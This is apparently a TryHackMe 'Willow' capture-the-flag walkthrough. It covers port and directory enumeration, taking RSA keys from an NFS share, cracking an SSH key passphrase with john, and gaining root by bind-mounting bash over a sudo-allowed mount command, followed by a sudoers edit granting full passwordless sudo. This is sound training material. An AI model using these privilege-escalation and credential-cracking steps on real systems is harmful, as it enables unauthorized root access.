Willow TryHackMe Walkthrough

TryHackMe Willow Writeup

What lies under the Willow Tree? Grab the flags from the Willow

Enumeration

Let’s add to /etc/hosts and run rustscan

╰─⠠⠵ rustscan -a willow — ulimit 10000 — -sC -sV -oA willow -A

. — — . .-. .-. . — — .. — -. . — — . . — -. . — . .-. .-.

| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |

| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |

`-’ `-’` — — -’` — — ‘ `-’ ` — — ‘ ` — -’ `-’ `-’`-’ `-’

The Modern Day Port Scanner.

________________________________________

: https://discord.gg/GFrQsGy :

: https://github.com/RustScan/RustScan :

— — — — — — — — — — — — — — — — — — —

Real hackers hack time ⌛

[~] The config file is expected to be at “/home/tony/.rustscan.toml”

[~] Automatically increasing ulimit value to 10000.

Open 10.10.30.196:22

Open 10.10.30.196:80

Open 10.10.30.196:111

Open 10.10.30.196:2049

[~] Starting Script(s)

[>] Script to be run Some(“nmap -vvv -p {{port}} {{ip}}”)

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021–04–03 20:03 BST

NSE: Loaded 151 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 3) scan.

Initiating NSE at 20:03

Completed NSE at 20:03, 0.00s elapsed

NSE: Starting runlevel 2 (of 3) scan.

Initiating NSE at 20:03

Completed NSE at 20:03, 0.00s elapsed

NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 20:03

Completed NSE at 20:03, 0.00s elapsed

Initiating Ping Scan at 20:03

Scanning 10.10.30.196 [2 ports]

Completed Ping Scan at 20:03, 0.04s elapsed (1 total hosts)

Initiating Connect Scan at 20:03

Scanning willow (10.10.30.196) [4 ports]

Discovered open port 22/tcp on 10.10.30.196

Discovered open port 111/tcp on 10.10.30.196

Discovered open port 80/tcp on 10.10.30.196

Discovered open port 2049/tcp on 10.10.30.196

Completed Connect Scan at 20:03, 0.03s elapsed (4 total ports)

Initiating Service scan at 20:03

Scanning 4 services on willow (10.10.30.196)

Completed Service scan at 20:04, 6.09s elapsed (4 services on 1 host)

NSE: Script scanning 10.10.30.196.

NSE: Starting runlevel 1 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 1.45s elapsed

NSE: Starting runlevel 2 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.18s elapsed

NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

Nmap scan report for willow (10.10.30.196)

Host is up, received conn-refused (0.034s latency).

Scanned at 2021–04–03 20:03:55 BST for 8s

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)

| ssh-hostkey:

| 1024 43:b0:87:cd:e5:54:09:b1:c1:1e:78:65:d9:78:5e:1e (DSA)

| ssh-dss AAAAB3NzaC1kc3MAAACBAJHkiuOeIrYxoyBBsJX2wpThJlvbsanlxpYXyHspzVIdeGQq3kD/2h1iNbOLwIb/iwS4oaY83OwxMiXImgKm/QgpgffrrKmU41eI/q9i+3NhLfHLvoT5PWupe/UW5Y3/lfmIMD1UXTUJNYiA07w/kHKj9ElQs7EZ2oZ9L5j2/h/lAAAAFQDE3pT3CTjQSOUOqdgu9HBaB6d6FwAAAIAFWqdfVx3v+GNxecTNp1mDb64WZcf2ssl/j+B6hj5W7s++DTY7Ls/i2R0z5bQes+5rMWYvanYFyWYEj31qWmrLvluJbJKldG3IttW5WfMzIyOJ11MHGAMP2/ZXZ4w3t8dMMudgBPkXE1uGv+p03A1i+Z6UfvGVv4HrtlCwqCRBywAAAIBpf+5ztR5aSDuZPxe/BURQIBKqDhOVZOt+Zhcc1GEcdukmlfmyH0sSm/3ae4CYLqBgD1zzwwSg4IkPR8wb1wa3G5F+OSYymEoKuxYWYN4LlSe9vrIap/1C/NO+jMQ5ru6WYqBcNdPqHQ4r5I7MzhziLdNIhfBmY076aL2Dr/OsAg==

| 2048 c2:65:91:c8:38:c9:cc:c7:f9:09:20:61:e5:54:bd:cf (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0/BxHjpZXU3EhwOMURG/xIJno/fZBBw2tntPhQMsA+L6YoVL4IyTKTz6SGM6BcX9622CGutBiO0pc0vhGlf9v/4cUB7My3d1r3t3EkNF0SaKAmAZLm8QOFbmS/TyHy9wF5TGJLunz5cN3NdGIz3Bz2GHHouicRo/vopYmHxjItfVgVUD2u+e5Gkw7u+U1BxZOrQDlaUS41AJvZm9Pk0pn2hWXeGTCJu8oyCqaEi/u8Wu7Ylp/t15NjEpiDpRp2LH9ctB3EG50LL+ti2o8/U652wIoNhnoF33eI6HJget9jvSC03oOx5r6NqHbOn94kVAUjFbYzK716dBa+I5jocHr

| 256 bf:3e:4b:3d:78:b6:79:41:f4:7d:90:63:5e:fb:2a:40 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIW2cLhyEIs7aEuL5e/SGCx5HsLX1a1GfgE/YBPGXiaFt/AkVFA3leapIvX+CD5wc7wCKGDToBgx6bkIY9vb0T0=

| 256 2c:c8:87:4a:d8:f6:4c:c3:03:8d:4c:09:22:83:66:64 (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOsXsk2l13dc4bQlT0wYP6/4gpeoTx5IfVvOBF++ClPu

80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: Recovery Page

111/tcp open rpcbind syn-ack 2–4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100000 3,4 111/tcp6 rpcbind

| 100000 3,4 111/udp6 rpcbind

| 100003 2,3,4 2049/tcp nfs

| 100003 2,3,4 2049/tcp6 nfs

| 100003 2,3,4 2049/udp nfs

| 100003 2,3,4 2049/udp6 nfs

| 100005 1,2,3 48300/udp6 mountd

| 100005 1,2,3 51380/tcp mountd

| 100005 1,2,3 51516/udp mountd

| 100005 1,2,3 55854/tcp6 mountd

| 100021 1,3,4 37023/tcp6 nlockmgr

| 100021 1,3,4 47964/udp6 nlockmgr

| 100021 1,3,4 54419/tcp nlockmgr

| 100021 1,3,4 54556/udp nlockmgr

| 100024 1 33277/tcp6 status

| 100024 1 43108/tcp status

| 100024 1 47863/udp status

| 100024 1 58992/udp6 status

| 100227 2,3 2049/tcp nfs_acl

| 100227 2,3 2049/tcp6 nfs_acl

| 100227 2,3 2049/udp nfs_acl

|_ 100227 2,3 2049/udp6 nfs_acl

2049/tcp open nfs_acl syn-ack 2–3 (RPC #100227)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

NSE: Starting runlevel 2 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 8.25 seconds

22/ssh

No cred’s yet so let’s move on.

80/http

OK, that is random and looks like hex so let’s throw it into CyberChef.

Hey Willow, here’s your SSH Private key — you know where the decryption key is!

2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 [REDACTED]……………..

Hey Willow, here’s your SSH Private key — you know where the decryption key is!

Hmmm, ok so we have encrypted key but need to find the decryption. Let’s throw a gobuster at the webserver when we move on…

╰─⠠⠵ gobuster dir -u http://willow/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,bak,zip,tar.gz,gz,php,sql,db,php

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: http://willow/

[+] Method: GET

[+] Threads: 10

[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.1.0

[+] Extensions: bak,gz,db,txt,html,zip,tar.gz,php,sql

[+] Timeout: 10s

===============================================================

2021/04/03 20:11:05 Starting gobuster in directory enumeration mode

===============================================================

/index.html (Status: 200) [Size: 20474]

111/rpc

List of services

2049/nfs

Let’s take a look at what has been exported.

╰─⠠⠵ showmount -e willow

Export list for willow:

/var/failsafe *

Ok let’s mount it and take a look inside.

╰─⠠⠵ mkdir m

╰─⠠⠵ sudo mount willow:/var/failsafe m

╰─⠠⠵ find m -exec ls -l ‘{}’ \;

total 4

-rw-r — r — 1 root root 62 Jan 30 2020 rsa_keys

-rw-r — r — 1 root root 62 Jan 30 2020 m/rsa_keys

╰─○ cat rsa_keys

Public Key Pair: ([REDACTED])

Private Key Pair: ([REDACTED])

Ok so that looks like the decryption keys we need.

User Flag:

Using the key above and https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html we can decrypt the key.

However we can see that the key is protected by a passphrase.

— — -BEGIN RSA PRIVATE KEY — — -

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,[REDACTED]

Using ssh2john we should be able to crack this.

╰─⠠⠵ /opt/john-1.9.0-jumbo-1/run/ssh2john.py id_willow > id.hash

╰─⠠⠵ /opt/john-1.9.0-jumbo-1/run/john id.hash — wordlist=rockyou.txt

Using default input encoding: UTF-8

Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes

Cost 2 (iteration count) is 1 for all loaded hashes

Will run 8 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press ‘q’ or Ctrl-C to abort, almost any other key for status

[REDACTED] (id_willow)

Warning: Only 1 candidate left, minimum 8 needed for performance.

Session completed

Using this we can now ssh to the box.

╰─⠠⠵ chmod 400 id_willow

╰─⠠⠵ ssh -i id_willow willow@willow

The authenticity of host ‘willow (10.10.30.196)’ can’t be established.

ECDSA key fingerprint is SHA256:6caf+NZ1ecyCIYr6PD09286by/SsrR4UdA9DZR/SgD4.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added ‘willow,10.10.30.196’ (ECDSA) to the list of known hosts.

Enter passphrase for key ‘id_willow’:

“O take me in your arms, love

For keen doth the wind blow

O take me in your arms, love

For bitter is my deep woe.”

-The Willow Tree, English Folksong

willow@willow-tree:~$

The user flag look to be an image so let’s copy it back to our machine for a look

╰─⠠⠵ scp -i id_willow willow@willow:user.jpg .

Enter passphrase for key ‘id_willow’:

user.jpg

Using tesseract we can grab the text out of the image

╰─⠠⠵ tesseract user.jpg -

THM{[REDACTED]}

Root Flag:

OK, now we have the user flag let’s move on to privesc. Checking sudo -l we get

willow@willow-tree:~$ sudo -l

Matching Defaults entries for willow on willow-tree:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User willow may run the following commands on willow-tree:

(ALL : ALL) NOPASSWD: /bin/mount /dev/*

We can use mount to mount anything under /dev/ so lets abuse this..

willow@willow-tree:~/t$ cp /bin/bash /dev/shm/

willow@willow-tree:~/t$ sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind

willow@willow-tree:~/t$ echo “bash” > /dev/shm/shell

willow@willow-tree:~/t$ sudo /bin/mount /dev/shm/shell

root@willow-tree:/home/willow/t# id

uid=0(root) gid=0(root) groups=0(root)

OK we are root so lets take a look at the flag

root@willow-tree:~# cat root.txt

This would be too easy, don’t you think? I actually gave you the root flag some time ago.

You’ve got my password now — go find your flag!

Damn, I wonder if I have rooted this in a different way than the author intended ? Let’s see if we can find the flag atleast.

Looking at netstat we can see exim4 listening on `127.0.0.11

root@willow-tree:/var/spool/exim4# netstat -anp | grep “127.0.0.1”

tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 1004/exim4

udp 0 0 127.0.0.1:701 0.0.0.0:* 525/rpc.statd

root@willow-tree:/var/spool/exim4# cd /var/log/exim4/

Jump across to /var/mail/mail we can see a cronjob is sending mail.

From root@localhost.localdomain Wed Feb 05 22:41:13 2020

Return-path: <root@localhost.localdomain>

Envelope-to: root@localhost.localdomain

Delivery-date: Wed, 05 Feb 2020 22:41:13 +0000

Received: from root by willow-tree with local (Exim 4.84)

(envelope-from <root@localhost.localdomain>)

id 1izTM9–00008v-Jf

for root@localhost.localdomain; Wed, 05 Feb 2020 22:41:13 +0000

From: root@localhost.localdomain (Cron Daemon)

To: root@localhost.localdomain

Subject: Cron <root@willow-tree> mv /dev/xvda5 /dev/hidden_backup

MIME-Version: 1.0

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

X-Cron-Env: <SHELL=/bin/sh>

X-Cron-Env: <HOME=/root>

X-Cron-Env: <PATH=/usr/bin:/bin>

X-Cron-Env: <LOGNAME=root>

Message-Id: <E1izTM9–00008v-Jf@willow-tree>

Date: Wed, 05 Feb 2020 22:41:13 +0000

mv: cannot stat ‘/dev/xvda5’: No such file or directory

As my privesc has broken mount let’s edit sudoers and give willow extra permissions with visudo

willow ALL=(ALL:ALL) NOPASSWD: ALL

Now let’s drop back down and undo our changes.

willow@willow-tree:~$ sudo umount /bin/mount

willow@willow-tree:~$ sudo mount /dev/hidden_backup /mnt/

willow@willow-tree:~$ ls /mnt/

creds.txt

willow@willow-tree:~$ cat /mnt/creds.txt

root:[REDACTED]

willow:[REDACTED]

Ok so we have credentials but we still need to find the flag. Looking around the file system I can not find anything that could be the flag.

This would be too easy, don’t you think? I actually gave you the root flag some time ago.

Hmmm… Thinking about this cryptic clue the only thing I can think that we were given is the user.jpg…. Trying steghide on this file..

╰─⠠⠵ steghide extract -sf user.jpg

Enter passphrase:

steghide: could not extract any data with that passphrase!

Ok, so looks like there might be something there, trying root’s credentials…

╰─⠠⠵ steghide extract -sf user.jpg

Enter passphrase:

wrote extracted data to “root.txt”.

╰─⠠⠵ cat root.txt

THM{[REDACTED]}

Finally we have root flag!

Conclusion

That was an interesting room, think the privesc I used was different to what was expected.